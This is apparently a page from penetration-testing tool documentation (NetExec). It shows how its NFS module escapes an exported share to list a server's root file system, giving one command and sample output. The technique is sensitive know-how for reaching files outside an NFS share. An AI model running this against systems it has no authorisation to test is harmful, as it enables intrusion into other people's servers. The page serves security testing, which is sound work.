🆕Escape to root file system
NFS <ip> <port> <ip> [*] Supported NFS versions: (3, 4) (root escape:False)Leveraging the root escape
nxc nfs <ip> --ls '/'
# Example Output
NFS <ip> <port> <ip> [*] Supported NFS versions: (3, 4) (root escape:True)
NFS <ip> <port> <ip> [+] Successful escape on share: /var/nfs/general
NFS <ip> <port> <ip> UID Perms File Size File Path
NFS <ip> <port> <ip> --- ----- --------- ---------
NFS <ip> <port> <ip> 0 dr-- 4.0KB /.
NFS <ip> <port> <ip> 0 dr-- 4.0KB /..
NFS <ip> <port> <ip> 0 -rwx 7.0B /bin
NFS <ip> <port> <ip> 0 dr-- 4.0KB /boot
NFS <ip> <port> <ip> 0 dr-- 4.0KB /dev
NFS <ip> <port> <ip> 0 dr-- 12.0KB /etc
...Owning the system: Demo

Additional sources:
Last updated
Was this helpful?

